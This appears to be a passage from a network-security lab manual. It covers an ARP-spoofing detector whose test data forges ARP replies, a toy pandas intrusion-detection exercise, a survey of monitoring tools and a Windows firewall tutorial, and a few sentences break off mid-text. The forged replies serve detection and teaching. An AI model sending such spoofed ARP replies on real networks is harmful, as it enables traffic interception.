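        raise ValueError("truncated ARP payload")
    htype, ptype, hlen, plen, op, sha, spa, _, _ = struct.unpack(ARP_FMT, payload[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return op, mac_str(sha), socket.inet_ntoa(spa)


class ArpWatch:
    """Track IP -> MAC bindings and report changes.

    The first binding seen (or one supplied as static) is kept, so repeated
    spoofed replies keep alerting. A legitimate address change, such as a
    replaced network card, also alerts and has to be confirmed by hand.
    """

    def __init__(self, static=None):
        self.bindings = dict(static or {})

    def observe(self, payload):
        _, mac, ip = parse_arp(payload)
        alerts = []
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac
        elif known != mac:
            alerts.append(("binding-changed", ip, known, mac))
        others = sorted(i for i, m in self.bindings.items() if m == mac and i != ip)
        if others:
            alerts.append(("shared-mac", mac, ip, others))
        return alerts


def sample_traffic():
    gateway = ("00:00:00:00:00:01", "192.168.1.1")
    target = ("00:00:00:00:00:02", "192.168.1.2")
    third = ("00:00:00:00:00:66", "192.168.1.66")   # constructed third station
    return [
        build_arp_reply(*gateway, *target),          # normal replies
        build_arp_reply(*target, *gateway),
        build_arp_reply(*third, *gateway),
        # Same shape as the replies sent by poison(): the gateway's and the
        # target's IP announced from the third station's MAC.
        build_arp_reply(third[0], gateway[1], *target),
        build_arp_reply(third[0], target[1], *gateway),
    ]


if __name__ == "__main__":
    watch = ArpWatch()
    for number, packet in enumerate(sample_traffic(), 1):
        for alert in watch.observe(packet):
            print(f"packet {number}: {alert}")
```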

EX.NO: 8
DATE:

DEMONSTRATION OF INTRUSION DETECTION SYSTEM (IDS) USING ANY TOOL

AIM:

To demonstrate Intrusion Detection System(IDS) using Pandas, a Python library for data
manipulation and analysis.
ALGORITHM:
Step 1: Load the Data
• Create a synthetic dataset with features and labels indicating whether the network
traffic is normal or an attack.
• Load the dataset into a DataFrame using Pandas.
Step 2: Define the Detection Rule
• Create a function rule_based_detection that takes a row of the DataFrame and returns
'Attack' if specific conditions are met (e.g., Feature1 == 1 and Feature2 == 2),
otherwise 'Normal'.
Step 3: Apply the Rule to Detect Intrusions
• Use the apply method in Pandas to apply the rule_based_detection function to each
row of the DataFrame and create a new column for detected labels (Detected).
Step 4: Evaluate the Detection
• Use a confusion matrix to compare the detected labels (Detected) with the actual
labels (Label). The pd.crosstab function in Pandas helps generate this matrix for
evaluation.

PROGRAM:

import pandas as pd

# Sample synthetic dataset
data = {
    'Feature1': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
    'Feature2': [1, 1, 2, 2, 1, 1, 2, 2, 1, 1],
    'Label': ['Normal', 'Normal', 'Attack', 'Attack', 'Normal', 'Normal', 'Attack', 'Attack',
              'Normal', 'Normal']
}

# Create a DataFrame
df = pd.DataFrame(data)

# Rule-based function to detect intrusion
df['Detected'] = df.apply(
    lambda row: 'Attack' if row['Feature1'] == 1 and row['Feature2'] == 2 else 'Normal',
    axis=1)

# Evaluate the rule-based detection
print(pd.crosstab(df['Label'], df['Detected'], rownames=['Actual'], colnames=['Predicted']))

OUTPUT:
Predicted Attack Normal
Actual
Attack 2 2
Normal 0 6
RESULT:
Thus the program to demonstrate an Intrusion Detection System (IDS) using Pandas, a
Python library for data manipulation and analysis, is implemented successfully.

EX.NO: 9
DATE:

EXPLORE NETWORK MONITORING TOOLS

AIM:

To explore network monitoring tools.

NETWORK MONITORING:
Network monitoring is an essential part of network management. It involves using various
tools to monitor a system network and determine slowness and weak connections, among
other issues. Knowing more about these tools can help you understand them better and use
the right ones that suit your requirements.

What Are Network Monitoring Tools?

Network monitoring tools are software that you can use to evaluate network connections.
These software programs can help you monitor a network connection and identify network
issues, which may include failing network components, slow connection speed, network
outage or unidentifiable connections.

Network Monitoring Tools

Here are eight monitoring tools along with their descriptions and features:

1. SolarWinds Network Performance Monitor

SolarWinds Network Performance Monitor is a multi-vendor monitoring tool. It allows users
to monitor multiple vendors' networks at the same time. It also provides network insights for
thorough visibility into the health of the networks.

2. Auvik

Auvik is a network monitoring and management tool. It offers a quick implementation process
that helps users to set up the tool easily. It also has a clean user interface that makes it easy to
navigate and use. The tool provides in-depth network visibility that enables faster
troubleshooting for network issues. Users can automate network visibility using Auvik. It
provides real-time updates on network issues and configuration changes.

3. Datadog Network Monitoring

Datadog Network Monitoring offers services for on-premises devices and cloud networks. A
highlighting feature of this tool is the visualisations. It offers various graphical representations
of all

4. Paessler PRTG Network Monitor

Paessler's network connection monitoring tool provides a clean user interface and network
visibility on multiple devices. Users can track the health of different connection types like
local area networks (LAN), wide area network (WAN), servers, websites, applications and
services.

5. ManageEngine OpManager

ManageEngine OpManager is a good network monitoring and managing tool for users that
prefer an in-depth view of network health and issues. This tool provides over 2000 network
performance monitors that allow users to track and monitor their connections and perform
detailed analyses on issues.

6. Domotz

Domotz is an expansive tool that provides a list of features for monitoring network
connections. It allows users to customise their network monitoring preferences. Users can
write scripts to retrieve the data they wish to evaluate. It also allows connection to open
ports on remote devices while ensuring network security. Users can also scan and monitor
network connections globally. Domotz also allows users to back up and restore network
configuration for switches, firewalls and access points, and alerts when there is a change in
the configuration.

7. Checkmk

Checkmk is a tool that users can automate completely. You can customise its
operations and enable it to perform tasks automatically. It also identifies network and security
components without requiring manual setup by the user. For example, the tool can identify a
firewall even if the user has not set it up. Its Agent Bakery feature enables users to manage
agents and automate agent updating. This reduces the manual effort needed to monitor network
connections. The tool also includes over 2000 plug-ins for enhancing network monitoring.

8. Progress Whatsup Gold

Progress Whatsup Gold is a basic network monitoring software. It provides a minimal user
interface with essential features like device monitoring, application monitoring, analysing
network traffic and managing configurations. The tool allows users to monitor cloud devices,
inspect suspicious connections, automate configuration backups, and identify and resolve
bandwidth issues.

Other Tools For Network Monitoring

Here are three additional tools for network monitoring:


• Fortra Intermapper: This tool enables users to monitor network connections using network
maps, allowing them to get a holistic view of all the connections. It also provides various
colour codes for different network status, along with real-time notifications through text,
email and sound.

• Nagios Core: Nagios Core is a monitoring engine that works as the primary application for
all Nagios projects, including the Nagios Network Analyser.

• Zabbix: Zabbix provides a thorough network monitoring solution with features like server
monitoring, cloud monitoring, application monitoring and service monitoring. The tool
also includes features like metric collection, business monitoring and root cause analyses of
network issues, and allows users to establish a threshold for connection anomalies.

Tips To Choose A Network Monitoring And Management Tool

Here are some useful tips that you can consider while selecting a tool for network
monitoring:

Understand the requirements

Understanding why you require network monitoring software is important in the process.
Define what feature you want and for what purpose. This can help you identify the right tool
for your use. It may also help you choose the correct subscription plan on paid tools.

Browse multiple tools

Once you identify the requirements, consider browsing multiple tools. Visit the websites of
the tools and look for the features you require. Spend time studying the features and
understand how they can be useful to your requirements. You can also identify a few tools
and compare their features to each other.

Consider the budget

Some tools may be free to use, while some may require you to purchase a subscription plan.
Paid tools typically offer a free trial period of up to 30 days. Once you identify which tool you
may like to use, see if it is free or requires payment. If it is a paid tool, try exploring its
features and efficiency during the trial period. Consider keeping a backup tool in case the tool
that you choose does not fit your usage.

RESULT:

Thus the network monitoring tools were explored.

EX.NO: 10
DATE:

STUDY TO CONFIGURE FIREWALL, VPN

AIM:

To study the features of a firewall in providing network security and to set Firewall Security in
Windows.

Firewall in Windows 7

Windows 7 comes with two firewalls that work together. One is the Windows Firewall, and the
other is Windows Firewall with Advanced Security (WFAS). The main difference between
them is the complexity of the rules configuration. Windows Firewall uses simple rules that
directly relate to a program or a service. The rules in WFAS can be configured based on
protocols, ports, addresses and authentication. By default, both firewalls come with a predefined
set of rules that allow us to utilize network resources. This includes things like browsing the
web, receiving e-mails, etc. Other standard firewall exceptions are File and Printer Sharing,
Network Discovery, Performance Logs and Alerts, Remote Administration, Windows Remote
Management, Remote Assistance, Remote Desktop, Windows Media Player and Windows Media
Player Network Sharing Service.

With the firewall in Windows 7 we can configure inbound and outbound rules. By default, all
outbound traffic is allowed, and inbound responses to that traffic are also allowed. Inbound
traffic initiated from external sources is automatically blocked.

When we first connect to a network, we are prompted to select a network location. This
feature is known as Network Location Awareness (NLA). It enables us to assign a
network profile to the connection based on the location. Different network profiles contain
different collections of firewall rules. In Windows 7, different network profiles can be
configured on different interfaces. For example, our wired interface can have a different profile
than our wireless interface. There are three different network profiles available:

• Public
• Home/Work - private network
• Domain - used within a domain

Configuring Windows Firewall


To open Windows Firewall we can go to Start > Control Panel > Windows Firewall.

By default, Windows Firewall is enabled for both private (home or work) and public
networks. It is also configured to block all connections to programs that are not on the list of
allowed programs. To configure exceptions we can go to the menu on the left and select the
"Allow a program or feature through Windows Firewall" option.

Figure: Exceptions

To change settings in this window we have to click the "Change settings" button. As you can
see, here we have a list of predefined programs and features that can be allowed to
communicate on private or public networks. For example, notice that the Core Networking
feature is allowed on both private and public networks, while File and Printer Sharing is only
allowed on private networks. We can also see the details of an item in the list by selecting it
and then clicking the Details button.

Figure: Details

If we have a program on our computer that is not in this list, we can manually add it by
clicking on the "Allow another program" button.

Figure: Add a Program

Here we have to browse to the executable of our program and then click the Add button.
Notice that we can also choose location types on which this program will be allowed to
communicate by clicking on the "Network location types" button.

Figure: Network Locations

Many applications will automatically configure proper exceptions in Windows Firewall
when we run them. For example, if we enable streaming from Media Player, it will
automatically configure firewall settings to allow streaming. The same happens if we enable
the Remote Desktop feature from the system properties window. By enabling the Remote Desktop
feature we actually create an exception in Windows Firewall.

Windows Firewall can be turned off completely. To do that we can select the "Turn Windows
Firewall on or off" option from the menu on the left.
Figure: Firewall Customization

Note that we can modify settings for each type of network location (private or public).
An interesting point here is that we can block all incoming connections, including those in the
list of allowed programs.

Windows Firewall is actually a Windows service. As you know, services can be stopped and
started. If the Windows Firewall service is stopped, the Windows Firewall will not work.

Figure: Firewall Service

In our case the service is running. If we stop it, we will get a warning that we should turn on
our Windows Firewall.

Figure: Warning

Remember that with Windows Firewall we can only configure basic firewall settings, and this is
enough for most day-to-day users. However, we can't configure exceptions based on ports in
Windows Firewall any more. For that we have to use Windows Firewall with Advanced
Security.

How to Start & Use the Windows Firewall with Advanced Security

The Windows Firewall with Advanced Security is a tool which gives you detailed control
over the rules that are applied by the Windows Firewall. You can view all the rules that are
used by the Windows Firewall, change their properties, create new rules or disable existing
ones. In this tutorial we will share how to open the Windows Firewall with Advanced
Security, how to find your way around it and talk about the types of rules that are available
and what kind of traffic they filter.

How to Access the Windows Firewall with Advanced Security

There are several ways to open the Windows Firewall with Advanced Security:

One is to open the standard Windows Firewall window, by going to "Control Panel ->
System and Security -> Windows Firewall". Then, click or tap Advanced settings.

In Windows 7, another method is to search for the word firewall in the Start Menu search
box and click the "Windows Firewall with Advanced Security" result.

In Windows 8.1, Windows Firewall with Advanced Security is not returned in search results
and you need to use the first method shared above for opening it.

The Windows Firewall with Advanced Security looks and works the same both in Windows
7 and Windows 8.1. To continue our tutorial, we will use screenshots that were made in
Windows 8.1.

What Are The Inbound & Outbound Rules?

In order to provide the security you need, the Windows Firewall has a standard set of inbound
and outbound rules, which are enabled depending on the location of the network you are
connected to.

Inbound rules are applied to the traffic that is coming from the network and the Internet to
your computer or device. Outbound rules apply to the traffic from your computer to the
network or the Internet.

These rules can be configured so that they are specific to: computers, users, programs,
services, ports or protocols. You can also specify the type of network adapter (e.g.
wireless, cable, virtual private network) or user profile to which a rule applies.

In the Windows Firewall with Advanced Security, you can access all rules and edit their
properties. All you have to do is click or tap the appropriate unit in the left-side panel.

The rules used by the Windows Firewall can be enabled or disabled. The ones which are
enabled or active are marked with a green check-box in the Name column. The ones that are
disabled are marked with a gray check-box.

If you want to know more about a specific rule and learn its properties, right click on it and
select Properties, or select it and press Properties in the column on the right, which lists the
actions that are available for your selection.

What Are The Connection Security Rules?

Connection security rules are used to secure traffic between two computers while it crosses
the network. One example would be a rule which defines that connections between two
specific computers must be encrypted.

Unlike the inbound or outbound rules, which are applied only to one computer, connection
security rules require that both computers have the same rules defined and enabled.

If you want to see if there are any such rules on your computer, click or tap "Connection
Security Rules" on the panel on the left. By default, there are no such rules defined on
Windows computers and devices. They are generally used in business environments and such
rules are set by the network administrator.

What Does the Windows Firewall with Advanced Security Monitor?

The Windows Firewall with Advanced Security includes some monitoring features as well. In the
Monitoring section you can find the following information: the firewall rules that are active
(both inbound and outbound), the connection security rules that are active and whether there are
any active security associations.

You should note that the Monitoring section shows only the active rules for the current network
location.
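
The enabled state, direction and per-profile scope of rules described above can also be audited from a text listing. The following is an added example, not part of the original manual: it parses rules in the layout printed by `netsh advfirewall firewall show rule name=all` and lists the enabled inbound allow rules for one network profile. The sample listing, including the "Lab web server" rule, is constructed.

```python
# Constructed, abridged sample of `netsh advfirewall firewall show rule name=all` output.
SAMPLE = """\
Rule Name:                            Remote Desktop (TCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
RemoteIP:                             Any
LocalPort:                            3389
Action:                               Allow

Rule Name:                            File and Printer Sharing (SMB-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Private
RemoteIP:                             LocalSubnet
LocalPort:                            445
Action:                               Allow

Rule Name:                            Lab web server (constructed rule)
----------------------------------------------------------------------
Enabled:                              No
Direction:                            In
Profiles:                             Public
RemoteIP:                             Any
LocalPort:                            8080
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
RemoteIP:                             Any
LocalPort:                            Any
Action:                               Allow
"""


def parse_rules(text):
    """Split netsh output into one dict per rule, keyed by field name."""
    rules = []
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:  # separator rows and blank lines carry no field
            continue
        if key.strip() == "Rule Name":
            rules.append({})
        if rules:
            rules[-1][key.strip()] = value.strip()
    return rules


def active_inbound_allows(rules, profile):
    """(name, port, remote scope) of enabled inbound allow rules for a profile."""
    want = {"Enabled": "Yes", "Direction": "In", "Action": "Allow"}
    return [(r["Rule Name"], r.get("LocalPort"), r.get("RemoteIP")) for r in rules
            if all(r.get(k) == v for k, v in want.items())
            and profile in r.get("Profiles", "").split(",")]


if __name__ == "__main__":
    print(active_inbound_allows(parse_rules(SAMPLE), "Public"))
```

Rules that appear for the Public profile with a remote scope of Any are the ones worth reviewing first, since they accept connections from any address on an untrusted network.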

used to determine the operating system running on the host machine. Another feature is "boot
time filtering". This feature ensures that the firewall is working at the same time when the
network interface becomes active, which was not the case in previous versions of Windows.

We choose one of these network locations (Public, Home/Work or Domain) when we connect to a
network. We can always change the location in the Network and Sharing Center, in Control Panel.
The Domain profile can be automatically assigned by the NLA service when we log on to an Active
Directory domain. Note that we must have administrative rights in order to configure the
firewall in Windows 7.

RESULT:
Thus the study of the features of a firewall in providing network security and of setting
Firewall Security in Windows was performed.
